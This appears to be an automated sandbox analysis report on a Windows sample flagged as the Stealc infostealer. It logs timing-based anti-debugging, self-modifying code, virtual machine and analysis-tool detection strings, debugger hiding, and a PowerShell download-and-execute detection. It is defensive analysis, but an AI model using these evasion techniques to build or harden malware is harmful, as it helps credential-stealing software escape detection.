                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0292E second address: D02938 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F68950EC3B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0C6C4 second address: D0C6C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B0C0 second address: D0B0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B0C4 second address: D0B0E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F68950E7998h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B0E4 second address: D0B0E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B0E9 second address: D0B107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950E7995h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B3DE second address: D0B3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B576 second address: D0B596 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jl 00007F68950E7986h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F68950E798Ah 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B869 second address: D0B89F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3C4h 0x00000007 jmp 00007F68950EC3C8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B89F second address: D0B8BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E7992h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B8BB second address: D0B8BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B8BF second address: D0B8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B8C5 second address: D0B8F0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F68950EC3BFh 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F68950EC3C6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0C3E9 second address: D0C3F3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F68950E798Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1003F second address: D1005B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F68950EC3C1h 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D142DF second address: D14322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 js 00007F68950E7986h 0x0000000b jmp 00007F68950E7993h 0x00000010 popad 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a push esi 0x0000001b pop esi 0x0000001c pushad 0x0000001d popad 0x0000001e pop edi 0x0000001f jmp 00007F68950E7996h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D30EA3 second address: D30EBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F68950EC3C0h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D30EBF second address: D30EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F895 second address: D3F8A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007F68950EC3B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F8A6 second address: D3F8AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F8AB second address: D3F8E9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F68950EC3BAh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F68950EC3BBh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007F68950EC3BAh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F68950EC3C6h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F8E9 second address: D3F8F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F8F6 second address: D3F8FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3FA52 second address: D3FA77 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F68950E7986h 0x00000008 je 00007F68950E7986h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F68950E798Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F68950E7986h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3FA77 second address: D3FA7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3FBE6 second address: D3FBEC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3FBEC second address: D3FBF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3FBF7 second address: D3FBFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40053 second address: D4007B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jp 00007F68950EC3B6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007F68950EC3C4h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4007B second address: D40080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40080 second address: D4008A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F68950EC3B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D401FC second address: D4021B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E7999h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4035C second address: D40375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jo 00007F68950EC3B6h 0x00000012 jnp 00007F68950EC3B6h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40375 second address: D4037B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4037B second address: D4037F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40515 second address: D40521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40521 second address: D40538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950EC3C2h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40538 second address: D40542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F68950E7986h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D406E0 second address: D406F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3C2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4200A second address: D42012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47943 second address: D47975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3BBh 0x00000007 jmp 00007F68950EC3BDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f pushad 0x00000010 pushad 0x00000011 jnp 00007F68950EC3B6h 0x00000017 push edx 0x00000018 pop edx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e je 00007F68950EC3B6h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47975 second address: D47984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F68950E7986h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A223 second address: D4A227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A227 second address: D4A22D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A488 second address: D4A48C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BB51 second address: D4BB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BB57 second address: D4BB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4D963 second address: D4D969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4D969 second address: D4D96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53902D6 second address: 53902DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53902DA second address: 53902DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53902DE second address: 53902E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53902E4 second address: 53902EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53902EA second address: 5390303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E798Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390303 second address: 5390307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390307 second address: 539030D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539030D second address: 539034D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F68950EC3C2h 0x00000009 jmp 00007F68950EC3C5h 0x0000000e popfd 0x0000000f mov cx, 6187h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 pushad 0x00000018 mov edx, 53210F9Eh 0x0000001d push eax 0x0000001e push edx 0x0000001f mov di, FF38h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539034D second address: 539039F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E7991h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F68950E798Eh 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F68950E798Dh 0x0000001b sub eax, 746FF086h 0x00000021 jmp 00007F68950E7991h 0x00000026 popfd 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539039F second address: 53903A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539045D second address: 5390461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390461 second address: 5390467 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390467 second address: 539046D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539046D second address: 5390471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390471 second address: 539047F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539047F second address: 5390484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AB1859 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AB1910 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C5BB1A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C6BA09 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CE48B6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_008638B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00864910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00864910
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0085DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0085E430
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_0085ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00864570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00864570
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00863EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00863EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0085F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_008516D0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0085DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0085BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00851160 GetSystemInfo,ExitProcess,1_2_00851160
                Source: file.exe, file.exe, 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000001.00000002.1472692554.0000000001625000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWw
                Source: file.exe, 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000001.00000002.1472692554.0000000001625000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000001.00000002.1472692554.00000000015F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                Source: file.exe, 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13683
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13686
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13705
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13737
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13697
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008545C0 VirtualProtect ?,00000004,00000100,000000001_2_008545C0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00869860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00869860
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00869750 mov eax, dword ptr fs:[00000030h]1_2_00869750
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008678E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,1_2_008678E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7828, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00869600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00869600
                Source: file.exe, file.exe, 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: p*Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00867B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00867980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,1_2_00867980
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00867850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_00867850
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00867A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,1_2_00867A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 1.2.file.exe.850000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
